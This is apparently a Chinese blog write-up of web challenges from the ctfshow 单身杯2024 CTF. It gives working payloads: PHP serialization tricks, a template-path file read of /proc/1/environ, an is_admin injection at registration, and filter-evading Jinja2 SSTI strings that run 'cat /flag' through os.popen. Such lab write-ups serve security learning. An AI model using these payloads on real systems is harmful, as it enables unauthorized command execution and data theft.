ctfshow单身杯2024 Writeup By V3geD4g

最新推荐文章于 2025-01-24 11:00:57 发布
原创 最新推荐文章于 2025-01-24 11:00:57 发布 · 1.8k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #网络安全 #php #python

WEB

签到·好玩的PHP

直接用数字和字符串绕就可以了

<?php

    class ctfshow {
   
   
        private $d = '1';
        private $s = '2';
        private $b = '3';
        private $ctf = 123;

        public function __destruct() {
   
   
            $this->d = (string)$this->d;
            $this->s = (string)$this->s;
            $this->b = (string)$this->b;

            if (($this->d != $this->s) && ($this->d != $this->b) && ($this->s != $this->b)) {
   
   
                $dsb = $this->d.$this->s.$this->b;

                if ((strlen($dsb) <= 3) && (strlen($this->ctf) <= 3)) {
   
   
                    if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) {
   
   
                        if (md5($dsb) === md5($this->ctf)) {
   
   
                            echo file_get_contents("/flag.txt");
                        }
                    }
                }
            }
        }
    }
echo urlencode(serialize(new ctfshow));

迷雾重重

有一个任意文件包含

全局搜include,找到下面这个位置vendor/workerman/webman-framework/src/support/view/Raw.php

这里有一个include $__template_path__;并且可以通过变量覆盖传入任意值

image-20241112155721576

继续往上找,发现support/helpers.php里面调用了render,并且参数可控,直接get传就行

image-20241112155925335

最后就是app/controller/IndexController.php首页控制器里面的testJson方法直接调用了上面的view,就结束了,是一个任意文件读取,最后payload如下

{
   
   "name":"guest","__template_path__":"/proc/1/environ"}

image-20241112160912082

ez_inject

比较脑洞,首先是原型链污染,由于不知道题目用的什么语言,只能硬猜,最后发现可以在注册时候直接多加一行is_admin去污染

POST /register HTTP/1.1
Host: 1954f8f7-4de5-49ad-9562-771f1fb7194c.challenge.ctf.show
Content-Length: 52
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Origin: https://1954f8f7-4de5-49ad-9562-771f1fb7194c.challenge.ctf.show
Content-Type: application/json
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://1954f8f7-4de5-49ad-9562-771f1fb7194c.challenge.ctf.show/register
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,pl;q=0.7,en;q=0.6
Priority: u=0, i
Connection: close

{"username":"aaa",
"password":"1",
"is_admin":1
}

image-20241112161517424

成为admin登录后,提示echo处存在注入

image-20241112161545253

试了一下是一个不用括号的ssti,不知道过滤了什么,只能慢慢试出来,最后可以用的payload如下

config|attr('__in''it__')|attr('__glo''bals__')|attr('__geti''tem__')('os')|attr('popen')('ca''t /f''lag')|attr('re''ad')()

image-20241112161559873

ezzz_ssti

只限制了长度的ssti,最大长度40,用config.update就行了,最后payload如下

{
   
   {
   
   config.update(f=lipsum.__globals__)}}
{
   
   {
   
   config.update(o=config.f.os)}}
{
   
   {
   
   config.update(p=config.o.popen)}}
{
   
   {
   
   config.p(request.args.c).read()}}&c=cat /f*
最低0.47元/天 解锁文章

200万优质内容无限畅学
CTFshow单身 部分wp
Nancy523的博客
05-22 2507
前言:不会吧不会吧不会有人520521不约会打比赛吧 文章目录1、单身热身题目2、misc签到3小的串串4、任性老板5、蛤壳雪茄-16、蛤壳雪茄-27、The Dancing Men8、伪装成RSA的MUSC9、re签到10、magic 1、单身热身题目 应该是后台做了日期相关的验证,反正照常输一个日期不要太离谱的就哦了 2、misc签到 题目提示: 下载附件,ARCHPR爆破所有可打印字符,位数为5位,得到压缩包密码61f@X 010editor打开解压得到的图片可以找到 base6.
CTFShow-web入门WriteUp(长期更新)
子推的Blog
03-26 793
web21 下载zip文件是后台密码字典,用户名猜测admin,先进行抓包 有发现我们传输的参数,但是HTTP请求头里面有这样的参数 解码之后发现这是我们传输的参数,所以开始爆破 因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可 然后对payload进行base64加密,进行爆破 这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码 或者写python
2024春秋冬季赛 ez forensics题解 使用LovelyMem
m0_70369590的博客
01-17 1091
接下来直接套了原题,使用flag_is_here作为MobaXterm的主密钥去对root用户密码进行解密。使用LovelyMem Vol2-拓展功能-Mimikatz得到密码strawberries。解密得到hint内容,告诉我们hashdump得到的用户密码就是7z压缩包的密码。使用LovelyMem快速检查,发现桌面上有hint和f14g.7z,导出文件。hint提示60=?,想到ROT47+ROT13。解压压缩包,发现是MobaXterm的配置文件。最后base64得到flag。
CTF常用工具_实时更新
baimao__Ch的博客
04-29 1025
近期在做一些ctf题,其中会涉及到许多工具,起初我会使用百度网盘在每一篇博客放置对应的工具,但因网盘上传有上限,所以现在我将练习中所用到所有的工具放置在这篇文章中。需要下载的小伙伴可随时拿取,分享有效期为永久分享。常用工具及常用网站为实时分享!!!从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
Lovelymem一把梭2024年美亚内存取证(Lovelymem软件使用详细步骤+软件+检材链接)
m0_37867238的博客
12-25 3004
Lovelymem一把梭2024年美亚内存取证(Lovelymem软件使用详细步骤+软件+检材链接)
2024年美亚资格赛内存取证–使用Lovelymem一把梭
2301_81210668的博客
01-22 952
Lovelymem在内存取证里的便捷使用
ctfshow单身2024wp
star3119391396的博客
11-25 1555
dsbctf-wp-web部分
2024CTFShow-电子取证篇Writeup_ctfshow 电子取证(3),2024年最新剖析网络安全开发未来的出路在哪里
2401_84264727的博客
05-05 706
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。最后就是大家最关心的网络安全面试题板块。
CTFSHOW 内部赛web writeup
ashMOB的博客
10-29 5251
CTFSHOW 内部赛web writeup 太菜了不会写,按着羽师傅和bmth666师傅的writeup复现 签到 打开界面如上,右键源码可以看到有一个register.php注册界面,需要利用login和register界面来进行sql盲注,sql太菜了连代码都看不懂,直接贴师傅们写的脚本 import requests import re url1 = "http://dd2ae20d-7588-4d04-af33-86ce7a48313d.challenge.ctf.show/register.
ctfshow吃瓜 misc writeup
ashMOB的博客
11-15 1078
ctfshow吃瓜 misc writeup 基本还是看着大佬wp去复现 ctfshow吃瓜 八月群赛 WriteUp/WP_是Mumuzi的博客-CSDN博客 Misc游戏签到 游戏题,比较看脸,因为遇到太多次靶场死机所以直接抄flag上去了 She Never Owns a Window 下载下来打开发现是一个文本文件,但是有许多空白换行和tab 提示说不是SNOW(Steganography -SNOW- AVariation:这是一种创新的 隐写 技术,可用于隐藏两个单词之间的空格后面的文本数据
ctfshow 网络迷踪-耳熟能详
东海梦城的博客
03-23 338
先通过这段音频得到这一定是经过更改的,并且特殊处理大概是倒放,挖词,变声等等 这里也就是大概猜了一下——倒放 首先下载Audacity Audacity – Download Audacity for Windows, macOS and Linux 这里有下载地址并且要看清自己的系统 进入音频 ...
2024美亚个人赛
qq_44640313的博客
11-22 2619
2024美亚个人赛复现
CTFshow-菜狗WP
m0_61155226的博客
11-14 6669
然后得到了压缩包中的音频文件,然后发现文件后缀为.wav而不是原本的.mp3,猜测需要使用Silent eye工具 Sound qualit选择high,然后就得到flag啦。这里发现成功破除伪加密(也可以手动修改破伪加密),然后通过文件头判断压缩包中的文件类型为.pyc,并修改文件后缀名为.pyc(否则在线工具无法正常反编译;打开链接发现是看图识美女,要通过30关;访问链接发现是探姬的福利视频(bushi),然后根据提示的摩斯密码不难猜测到黑丝为1,白色为0,然后分割标志为视频的转场动画,
实训课第五天 CTF 竞赛 Writeup
qq_69439879的博客
04-19 2110
据报道,中国网络大亨小明近日编写了一个搜索引擎,叫白云新闻搜索,具体链接在下方,该搜索链接功能欠打,界面乏力,小明出一包辣条悬赏漏洞,豪言入侵高手都去试试,你服不服?路飞一行人千辛万苦来到了伟大航道的终点,找到了传说中的One piece,但是需要钥匙才能打开One Piece大门,钥匙就隐藏在下面的图片中,聪明的你能帮路飞拿到钥匙,打开One。详细描述解题的步骤、方法和过程截图,包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。展示解题的最终结果,包括得到的flag(标志)、分数或其他形式的验证。
ctfshow单身Crypto部分做题记录
2301_79035389的博客
11-15 1058
打开脚本,只有一个m,long_to_bytes(m),得到n,c的十六进制,在这里发现一个细节,直接使用int(n)就可以把n转为十进制,加不加16都可以接着根据提示,爆破d,得到flag。
ctfshow 单身Misc easy_mem
Alc0rIl1uminate的博客
11-15 1314
ctfshow单身misc:easy_mem1、2、3
2024年春秋misc方向--ez forensics题解(使用lovelymemv版)
最新发布
sveewg的博客
01-24 8809
最近在做春秋时,有一道取证题手搓有点难,便想到了lovelymemv这个工具,接下来一起开开怎么做的吧。
CTFSHOW-单身WEB部分复现WP)
qq_61620566的博客
11-15 4786
CTFSHOW单身赛后复盘
i春秋 afr3 任意文件读取 SSTI flask模板注入 session伪造 详细题解
AAAAAAAAAAAA66的博客
11-23 3992
---------------------------------------------------------------------------------------------------------------------------------这道题考察的范围挺广的,对于我这样的新手很不友好,那些知识也不是一时半会就能够学完的, 我也是搞了好几天,才理解思路和相关细节。 但其实对于这道题来说,只需要从那几个知识面中,了解几个'支点'就能做出。 又回到那句话,做题扩充各种知识点,比从0到1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值